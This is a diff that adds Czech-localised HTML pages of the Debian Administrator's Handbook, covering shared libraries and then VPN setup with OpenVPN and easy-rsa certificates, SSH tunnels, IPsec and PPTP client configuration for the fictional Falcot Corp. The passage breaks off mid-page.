+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.libraries"></a>B.5.4. Libraries</h3></div></div></div><a
+            id="id-1.21.8.8.2"
+            class="indexterm"></a><div
+            class="para">
+				Function libraries play a crucial role in a Unix-like operating system. They are not proper programs, since they cannot be executed on their own, but collections of code fragments that can be used by standard programs. Among the common libraries, you can find:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						the standard C library (<span
+                    class="emphasis"><em>glibc</em></span>), which contains basic functions such as ones to open files or network connections, and others facilitating interactions with the kernel;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						graphical toolkits, such as Gtk+ and Qt, allowing many programs to reuse the graphical objects they provide;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the <span
+                    class="emphasis"><em>libpng</em></span> library, that allows loading, interpreting and saving images in the PNG format.
+					</div></li></ul></div><div
+            class="para">
+				Thanks to those libraries, applications can reuse existing code. Application development is simplified since many applications can reuse the same functions. With libraries often developed by different persons, the global development of the system is closer to Unix's historical philosophy.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> The Unix Way: one thing at a time</strong></p></div></div></div><div
+              class="para">
+				One of the fundamental concepts that underlies the Unix family of operating systems is that each tool should only do one thing, and do it well; applications can then reuse these tools to build more advanced logic on top. This philosophy can be seen in many incarnations. Shell scripts may be the best example: they assemble complex sequences of very simple tools (such as <code
+                class="command">grep</code>, <code
+                class="command">wc</code>, <code
+                class="command">sort</code>, <code
+                class="command">uniq</code> and so on). Another implementation of this philosophy can be seen in code libraries: the <span
+                class="emphasis"><em>libpng</em></span> library allows reading and writing PNG images, with different options and in different ways, but it does only that; no question of including functions that display or edit images.
+			</div></div><div
+            class="para">
+				Moreover, these libraries are often referred to as “shared libraries”, since the kernel is able to only load them into memory once, even if several processes use the same library at the same time. This allows saving memory, when compared with the opposite (hypothetical) situation where the code for a library would be loaded as many times as there are processes using it.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-role-and-tasks.html"><strong>Předcházející</strong>B.4. Some Tasks Handled by the Kernel</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="backcover.html"><strong>Další</strong>Příloha C. The Debian Administrator's Handbook</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html
new file mode 100644
index 000000000..3935cc07f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html
@@ -0,0 +1,783 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.2. Virtual Private Network</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="next"
+        href="sect.quality-of-service.html"
+        title="10.3. Quality of Service" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.virtual-private-network.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-infrastructure.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quality-of-service.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.virtual-private-network"></a>10.2. Virtual Private Network</h2></div></div></div><div
+          class="para">
+			A <span
+            class="emphasis"><em>Virtual Private Network</em></span> (VPN for short) is a way to link two different local networks through the Internet by way of a tunnel; the tunnel is usually encrypted for confidentiality. VPNs are often used to integrate a remote machine within a company's local network.
+		</div><a
+          id="id-1.13.5.3"
+          class="indexterm"></a><a
+          id="id-1.13.5.4"
+          class="indexterm"></a><a
+          id="id-1.13.5.5"
+          class="indexterm"></a><div
+          class="para">
+			Several tools provide this. OpenVPN is an efficient solution, easy to deploy and maintain, based on SSL/TLS. Another possibility is using IPsec to encrypt IP traffic between two machines; this encryption is transparent, which means that applications running on these hosts need not be modified to take the VPN into account. SSH can also be used to provide a VPN, in addition to its more conventional features. Finally, a VPN can be established using Microsoft's PPTP protocol. Other solutions exist, but are beyond the focus of this book.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.openvpn"></a>10.2.1. OpenVPN</h3></div></div></div><a
+            id="id-1.13.5.7.2"
+            class="indexterm"></a><div
+            class="para">
+				OpenVPN is a piece of software dedicated to creating virtual private networks. Its setup involves creating virtual network interfaces on the VPN server and on the client(s); both <code
+              class="literal">tun</code> (for IP-level tunnels) and <code
+              class="literal">tap</code> (for Ethernet-level tunnels) interfaces are supported. In practice, <code
+              class="literal">tun</code> interfaces will most often be used except when the VPN clients are meant to be integrated into the server's local network by way of an Ethernet bridge.
+			</div><div
+            class="para">
+				OpenVPN relies on OpenSSL for all the SSL/TLS cryptography and associated features (confidentiality, authentication, integrity, non-repudiation). It can be configured either with a shared private key or using X.509 certificates based on a public key infrastructure. The latter configuration is strongly preferred since it allows greater flexibility when faced with a growing number of roaming users accessing the VPN.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> SSL and TLS</strong></p></div></div></div><a
+              id="id-1.13.5.7.5.2"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.5.3"
+              class="indexterm"></a><div
+              class="para">
+				The SSL protocol (<span
+                class="emphasis"><em>Secure Socket Layer</em></span>) was invented by Netscape to secure connections to web servers. It was later standardized by IETF under the acronym TLS (<span
+                class="emphasis"><em>Transport Layer Security</em></span>). Since then TLS continued to evolve and nowadays SSL is deprecated due to multiple design flaws that have been discovered.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.easy-rsa"></a>10.2.1.1. Public Key Infrastructure: <span
+                      class="emphasis"><em>easy-rsa</em></span></h4></div></div></div><a
+              id="id-1.13.5.7.6.2"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.3"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.4"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.5"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.6"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.7"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.8"
+              class="indexterm"></a><div
+              class="para">
+					The RSA algorithm is widely used in public-key cryptography. It involves a “key pair”, comprised of a private and a public key. The two keys are closely linked to each other, and their mathematical properties are such that a message encrypted with the public key can only be decrypted by someone knowing the private key, which ensures confidentiality. In the opposite direction, a message encrypted with the private key can be decrypted by anyone knowing the public key, which allows authenticating the origin of a message since only someone with access to the private key could generate it. When associated with a digital hash function (MD5, SHA1, or a more recent variant), this leads to a signature mechanism that can be applied to any message.
+				</div><div
+              class="para">
+					However, anyone can create a key pair, store any identity on it, and pretend to be the identity of their choice. One solution involves the concept of a <span
+                class="emphasis"><em>Certification Authority</em></span> (CA), formalized by the X.509 standard. This term covers an entity that holds a trusted key pair known as a <span
+                class="emphasis"><em>root certificate</em></span>. This certificate is only used to sign other certificates (key pairs), after proper steps have been undertaken to check the identity stored on the key pair. Applications using X.509 can then check the certificates presented to them, if they know about the trusted root certificates.
+				</div><div
+              class="para">
+					OpenVPN follows this rule. Since public CAs only emit certificates in exchange for a (hefty) fee, it is also possible to create a private certification authority within the company. The <span
+                class="pkg pkg">easy-rsa</span> package provides tools to serve as an X.509 certification infrastructure, implemented as a set of scripts using the <code
+                class="command">openssl</code> command.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> <span
+                          class="emphasis"><em>easy-rsa</em></span> before <span
+                          class="distribution distribution">Jessie</span></strong></p></div></div></div><div
+                class="para">
+					In versions of Debian up to <span
+                  class="distribution distribution">Wheezy</span>, <span
+                  class="emphasis"><em>easy-rsa</em></span> was distributed as part of the <span
+                  class="pkg pkg">openvpn</span> package, and its scripts were to be found under <code
+                  class="filename">/usr/share/doc/openvpn/examples/easy-rsa/2.0/</code>. Setting up a CA involved copying that directory, instead of using the <code
+                  class="command">make-cadir</code> command as documented here.
+				</div></div><div
+              class="para">
+					The Falcot Corp administrators use this tool to create the required certificates, both for the server and the clients. This allows the configuration of all clients to be similar since they will only have to be set up so as to trust certificates coming from Falcot's local CA. This CA is the first certificate to create; to this end, the administrators set up a directory with the files required for the CA in an appropriate location, preferably on a machine not connected to the network in order to mitigate the risk of the CA's private key being stolen.
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>make-cadir pki-falcot
+</code></strong><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>cd pki-falcot</code></strong></pre><div
+              class="para">
+					They then store the required parameters into the <code
+                class="filename">vars</code> file, especially those named with a <code
+                class="literal">KEY_</code> prefix; these variables are then integrated into the environment:
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>vim vars
+</code></strong><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>grep KEY_ vars
+</code></strong><code
+                class="computeroutput">export KEY_CONFIG=`$EASY_RSA/whichopensslcnf $EASY_RSA`
+export KEY_DIR="$EASY_RSA/keys"
+echo NOTE: If you run ./clean-all, I will be doing a rm -rf on $KEY_DIR
+export KEY_SIZE=2048
+export KEY_EXPIRE=3650
+export KEY_COUNTRY="FR"
+export KEY_PROVINCE="Loire"
+export KEY_CITY="Saint-Étienne"
+export KEY_ORG="Falcot Corp"
+export KEY_EMAIL="admin@falcot.com"
+export KEY_OU="Certificate authority"
+export KEY_NAME="Certificate authority for Falcot Corp"
+# If you'd like to sign all keys with the same Common Name, uncomment the KEY_CN export below
+# export KEY_CN="CommonName"
+$ </code><strong
+                class="userinput"><code>. ./vars
+</code></strong><code
+                class="computeroutput">NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/roland/pki-falcot/keys
+$ </code><strong
+                class="userinput"><code>./clean-all
+</code></strong></pre><div
+              class="para">
+					The next step is the creation of the CA's key pair itself (the two parts of the key pair will be stored under <code
+                class="filename">keys/ca.crt</code> and <code
+                class="filename">keys/ca.key</code> during this step):
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>./build-ca</code></strong>
+<code
+                class="computeroutput">Generating a 2048 bit RSA private key
+...................................................................+++
+...+++
+writing new private key to 'ca.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [Falcot Corp CA]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+</code></pre><div
+              class="para">
+					The certificate for the VPN server can now be created, as well as the Diffie-Hellman parameters required for the server side of an SSL/TLS connection. The VPN server is identified by its DNS name <code
+                class="literal">vpn.falcot.com</code>; this name is re-used for the generated key files (<code
+                class="filename">keys/vpn.falcot.com.crt</code> for the public certificate, <code
+                class="filename">keys/vpn.falcot.com.key</code> for the private key):
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>./build-key-server vpn.falcot.com
+</code></strong><code
+                class="computeroutput">Generating a 2048 bit RSA private key
+.....................................................................................................................+++
+...........+++
+writing new private key to 'vpn.falcot.com.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [vpn.falcot.com]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+
+Please enter the following 'extra' attributes
+to be sent with your certificate request
+A challenge password []:
+An optional company name []:
+Using configuration from /home/roland/pki-falcot/openssl-1.0.0.cnf
+Check that the request matches the signature
+Signature ok
+The Subject's Distinguished Name is as follows
+countryName           :PRINTABLE:'FR'
+stateOrProvinceName   :PRINTABLE:'Loire'
+localityName          :T61STRING:'Saint-\0xFFFFFFC3\0xFFFFFF89tienne'
+organizationName      :PRINTABLE:'Falcot Corp'
+organizationalUnitName:PRINTABLE:'Certificate authority'
+commonName            :PRINTABLE:'vpn.falcot.com'
+name                  :PRINTABLE:'Certificate authority for Falcot Corp'
+emailAddress          :IA5STRING:'admin@falcot.com'
+Certificate is to be certified until Mar  6 14:54:56 2025 GMT (3650 days)
+Sign the certificate? [y/n]:</code><strong
+                class="userinput"><code>y
+</code></strong><code
+                class="computeroutput">
+
+1 out of 1 certificate requests certified, commit? [y/n]</code><strong
+                class="userinput"><code>y
+</code></strong><code
+                class="computeroutput">Write out database with 1 new entries
+Data Base Updated
+$ </code><strong
+                class="userinput"><code>./build-dh
+</code></strong><code
+                class="computeroutput">Generating DH parameters, 2048 bit long safe prime, generator 2
+This is going to take a long time
+[…]
+</code></pre><div
+              class="para">
+					The following step creates certificates for the VPN clients; one certificate is required for each computer or person allowed to use the VPN:
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>./build-key JoeSmith
+</code></strong><code
+                class="computeroutput">Generating a 2048 bit RSA private key
+................................+++
+..............................................+++
+writing new private key to 'JoeSmith.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:</code><strong
+                class="userinput"><code>Development unit
+</code></strong><code
+                class="computeroutput">Common Name (eg, your name or your server's hostname) [JoeSmith]:</code><strong
+                class="userinput"><code>Joe Smith
+</code></strong><code
+                class="computeroutput">[…]</code></pre><div
+              class="para">
+					Now all certificates have been created, they need to be copied where appropriate: the root certificate's public key (<code
+                class="filename">keys/ca.crt</code>) will be stored on all machines (both server and clients) as <code
+                class="filename">/etc/ssl/certs/Falcot_CA.crt</code>. The server's certificate is installed only on the server (<code
+                class="filename">keys/vpn.falcot.com.crt</code> goes to <code
+                class="filename">/etc/ssl/vpn.falcot.com.crt</code>, and <code
+                class="filename">keys/vpn.falcot.com.key</code> goes to <code
+                class="filename">/etc/ssl/private/vpn.falcot.com.key</code> with restricted permissions so that only the administrator can read it), with the corresponding Diffie-Hellman parameters (<code
+                class="filename">keys/dh2048.pem</code>) installed to <code
+                class="filename">/etc/openvpn/dh2048.pem</code>. Client certificates are installed on the corresponding VPN client in a similar fashion.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.13.5.7.7"></a>10.2.1.2. Configuring the OpenVPN Server</h4></div></div></div><div
+              class="para">
+					By default, the OpenVPN initialization script tries starting all virtual private networks defined in <code
+                class="filename">/etc/openvpn/*.conf</code>. Setting up a VPN server is therefore a matter of storing a corresponding configuration file in this directory. A good starting point is <code
+                class="filename">/usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz</code>, which leads to a rather standard server. Of course, some parameters need to be adapted: <code
+                class="literal">ca</code>, <code
+                class="literal">cert</code>, <code
+                class="literal">key</code> and <code
+                class="literal">dh</code> need to describe the selected locations (respectively, <code
+                class="literal">/etc/ssl/certs/Falcot_CA.crt</code>, <code
+                class="literal">/etc/ssl/vpn.falcot.com.crt</code>, <code
+                class="literal">/etc/ssl/private/vpn.falcot.com.key</code> and <code
+                class="literal">/etc/openvpn/dh2048.pem</code>). The <code
+                class="literal">server 10.8.0.0 255.255.255.0</code> directive defines the subnet to be used by the VPN; the server uses the first IP address in that range (<code
+                class="literal">10.8.0.1</code>) and the rest of the addresses are allocated to clients.
+				</div><div
+              class="para">
+					With this configuration, starting OpenVPN creates the virtual network interface, usually under the <code
+                class="literal">tun0</code> name. However, firewalls are often configured at the same time as the real network interfaces, which happens before OpenVPN starts. Good practice therefore recommends creating a persistent virtual network interface, and configuring OpenVPN to use this pre-existing interface. This further allows choosing the name for this interface. To this end, <code
+                class="command">openvpn --mktun --dev vpn --dev-type tun</code> creates a virtual network interface named <code
+                class="literal">vpn</code> with type <code
+                class="literal">tun</code>; this command can easily be integrated in the firewall configuration script, or in an <code
+                class="literal">up</code> directive of the <code
+                class="filename">/etc/network/interfaces</code> file. The OpenVPN configuration file must also be updated accordingly, with the <code
+                class="literal">dev vpn</code> and <code
+                class="literal">dev-type tun</code> directives.
+				</div><div
+              class="para">
+					Barring further action, VPN clients can only access the VPN server itself by way of the <code
+                class="literal">10.8.0.1</code> address. Granting the clients access to the local network (192.168.0.0/24), requires adding a <code
+                class="literal">push route 192.168.0.0 255.255.255.0</code> directive to the OpenVPN configuration so that VPN clients automatically get a network route telling them that this network is reachable by way of the VPN. Furthermore, machines on the local network also need to be informed that the route to the VPN goes through the VPN server (this automatically works when the VPN server is installed on the gateway). Alternatively, the VPN server can be configured to perform IP masquerading so that connections coming from VPN clients appear as if they are coming from the VPN server instead (see <a
+                class="xref"
+                href="network-infrastructure.html#sect.gateway">10.1 – „Gateway“</a>).
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.13.5.7.8"></a>10.2.1.3. Configuring the OpenVPN Client</h4></div></div></div><div
+              class="para">
+					Setting up an OpenVPN client also requires creating a configuration file in <code
+                class="filename">/etc/openvpn/</code>. A standard configuration can be obtained by using <code
+                class="filename">/usr/share/doc/openvpn/examples/sample-config-files/client.conf</code> as a starting point. The <code
+                class="literal">remote vpn.falcot.com 1194</code> directive describes the address and port of the OpenVPN server; the <code
+                class="literal">ca</code>, <code
+                class="literal">cert</code> and <code
+                class="literal">key</code> also need to be adapted to describe the locations of the key files.
+				</div><div
+              class="para">
+					If the VPN should not be started automatically on boot, set the <code
+                class="literal">AUTOSTART</code> directive to <code
+                class="literal">none</code> in the <code
+                class="filename">/etc/default/openvpn</code> file. Starting or stopping a given VPN connection is always possible with the commands <code
+                class="command">service openvpn@<em
+                  class="replaceable">name</em> start</code> and <code
+                class="command">service openvpn@<em
+                  class="replaceable">name</em> stop</code> (where the connection <em
+                class="replaceable">name</em> matches the one defined in <code
+                class="filename">/etc/openvpn/<em
+                  class="replaceable">name</em>.conf</code>).
+				</div><div
+              class="para">
+					The <span
+                class="pkg pkg">network-manager-openvpn-gnome</span> package contains an extension to Network Manager (see <a
+                class="xref"
+                href="sect.network-config.html#sect.roaming-network-config">8.2.5 – „Automatic Network Configuration for Roaming Users“</a>) that allows managing OpenVPN virtual private networks. This allows every user to configure OpenVPN connections graphically and to control them from the network management icon. <a
+                id="id-1.13.5.7.8.4.3"
+                class="indexterm"></a>
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ssh-vpn"></a>10.2.2. Virtual Private Network with SSH</h3></div></div></div><a
+            id="id-1.13.5.8.2"
+            class="indexterm"></a><a
+            id="id-1.13.5.8.3"
+            class="indexterm"></a><div
+            class="para">
+				There are actually two ways of creating a virtual private network with SSH. The historic one involves establishing a PPP layer over the SSH link. This method is described in a HOWTO document: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.tldp.org/HOWTO/ppp-ssh/">http://www.tldp.org/HOWTO/ppp-ssh/</a></div>
+			</div><div
+            class="para">
+				The second method is more recent, and was introduced with OpenSSH 4.3; it is now possible for OpenSSH to create virtual network interfaces (<code
+              class="literal">tun*</code>) on both sides of an SSH connection, and these virtual interfaces can be configured exactly as if they were physical interfaces. The tunneling system must first be enabled by setting <code
+              class="literal">PermitTunnel</code> to “yes” in the SSH server configuration file (<code
+              class="filename">/etc/ssh/sshd_config</code>). When establishing the SSH connection, the creation of a tunnel must be explicitly requested with the <code
+              class="literal">-w any:any</code> option (<code
+              class="literal">any</code> can be replaced with the desired <code
+              class="literal">tun</code> device number). This requires the user to have administrator privilege on both sides, so as to be able to create the network device (in other words, the connection must be established as root).
+			</div><div
+            class="para">
+				Both methods for creating a virtual private network over SSH are quite straightforward. However, the VPN they provide is not the most efficient available; in particular, it does not handle high levels of traffic very well.
+			</div><div
+            class="para">
+				The explanation is that when a TCP/IP stack is encapsulated within a TCP/IP connection (for SSH), the TCP protocol is used twice, once for the SSH connection and once within the tunnel. This leads to problems, especially due to the way TCP adapts to network conditions by altering timeout delays. The following site describes the problem in more detail: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://sites.inka.de/sites/bigred/devel/tcp-tcp.html">http://sites.inka.de/sites/bigred/devel/tcp-tcp.html</a></div> VPNs over SSH should therefore be restricted to one-off tunnels with no performance constraints.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ipsec"></a>10.2.3. IPsec</h3></div></div></div><a
+            id="id-1.13.5.9.2"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.3"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.4"
+            class="indexterm"></a><div
+            class="para">
+				IPsec, despite being the standard in IP VPNs, is rather more involved in its implementation. The IPsec engine itself is integrated in the Linux kernel; the required user-space parts, the control and configuration tools, are provided by the <span
+              class="pkg pkg">ipsec-tools</span> package. In concrete terms, each host's <code
+              class="filename">/etc/ipsec-tools.conf</code> contains the parameters for <span
+              class="emphasis"><em>IPsec tunnels</em></span> (or <span
+              class="emphasis"><em>Security Associations</em></span>, in the IPsec terminology) that the host is concerned with; the <code
+              class="command">/etc/init.d/setkey</code> script provides a way to start and stop a tunnel (each tunnel is a secure link to another host connected to the virtual private network). This file can be built by hand from the documentation provided by the <span
+              class="citerefentry"><span
+                class="refentrytitle">setkey</span>(8)</span> manual page. However, explicitly writing the parameters for all hosts in a non-trivial set of machines quickly becomes an arduous task, since the number of tunnels grows fast. Installing an IKE daemon (for <span
+              class="emphasis"><em>IPsec Key Exchange</em></span>) such as <span
+              class="pkg pkg">racoon</span> or <span
+              class="pkg pkg">strongswan</span> makes the process much simpler by bringing administration together at a central point, and more secure by rotating the keys periodically.
+			</div><a
+            id="id-1.13.5.9.6"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.7"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.8"
+            class="indexterm"></a><a
+            id="id-1.13.5.9.9"
+            class="indexterm"></a><div
+            class="para">
+				In spite of its status as the reference, the complexity of setting up IPsec restricts its usage in practice. OpenVPN-based solutions will generally be preferred when the required tunnels are neither too many nor too dynamic.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> IPsec and NAT</strong></p></div></div></div><div
+              class="para">
+				NATing firewalls and IPsec do not work well together: since IPsec signs the packets, any change on these packets that the firewall might perform will void the signature, and the packets will be rejected at their destination. Various IPsec implementations now include the <span
+                class="emphasis"><em>NAT-T</em></span> technique (for <span
+                class="emphasis"><em>NAT Traversal</em></span>), which basically encapsulates the IPsec packet within a standard UDP packet.
+			</div><a
+              id="id-1.13.5.9.11.3"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.11.4"
+              class="indexterm"></a></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> IPsec and firewalls</strong></p></div></div></div><div
+              class="para">
+				The standard mode of operation of IPsec involves data exchanges on UDP port 500 for key exchanges (also on UDP port 4500 in the case that NAT-T is in use). Moreover, IPsec packets use two dedicated IP protocols that the firewall must let through; reception of these packets is based on their protocol numbers, 50 (ESP) and 51 (AH).
+			</div><a
+              id="id-1.13.5.9.12.3"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.12.4"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.12.5"
+              class="indexterm"></a><a
+              id="id-1.13.5.9.12.6"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.pptp"></a>10.2.4. PPTP</h3></div></div></div><div
+            class="para">
+				PPTP (for <span
+              class="emphasis"><em>Point-to-Point Tunneling Protocol</em></span>) uses two communication channels, one for control data and one for payload data; the latter uses the GRE protocol (<span
+              class="emphasis"><em>Generic Routing Encapsulation</em></span>). A standard PPP link is then set up over the data exchange channel.
+			</div><a
+            id="id-1.13.5.10.3"
+            class="indexterm"></a><a
+            id="id-1.13.5.10.4"
+            class="indexterm"></a><a
+            id="id-1.13.5.10.5"
+            class="indexterm"></a><a
+            id="id-1.13.5.10.6"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.pptp-config-client"></a>10.2.4.1. Configuring the Client</h4></div></div></div><div
+              class="para">
+					The <span
+                class="pkg pkg">pptp-linux</span> package contains an easily-configured PPTP client for Linux. The following instructions take their inspiration from the official documentation: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://pptpclient.sourceforge.net/howto-debian.phtml">http://pptpclient.sourceforge.net/howto-debian.phtml</a></div>
+				</div><a
+              id="id-1.13.5.10.7.3"
+              class="indexterm"></a><div
+              class="para">
+					The Falcot administrators created several files: <code
+                class="filename">/etc/ppp/options.pptp</code>, <code
+                class="filename">/etc/ppp/peers/falcot</code>, <code
+                class="filename">/etc/ppp/ip-up.d/falcot</code>, and <code
+                class="filename">/etc/ppp/ip-down.d/falcot</code>.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-options.pptp"></a><p
+                class="title"><strong>Příklad 10.2. The <code
+                    class="filename">/etc/ppp/options.pptp</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# PPP options used for a PPTP connection
+lock
+noauth
+nobsdcomp
+nodeflate
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-peers-falcot"></a><p
+                class="title"><strong>Příklad 10.3. The <code
+                    class="filename">/etc/ppp/peers/falcot</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# vpn.falcot.com is the PPTP server
+pty "pptp vpn.falcot.com --nolaunchpppd"
+# the connection will identify as the "vpn" user
+user vpn
+remotename pptp
+# encryption is needed
+require-mppe-128
+file /etc/ppp/options.pptp
+ipparam falcot
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-ip-up.d-falcot"></a><p
+                class="title"><strong>Příklad 10.4. The <code
+                    class="filename">/etc/ppp/ip-up.d/falcot</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Create the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route add -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="example.ppp-ip-down.d-falcot"></a><p
+                class="title"><strong>Příklad 10.5. The <code
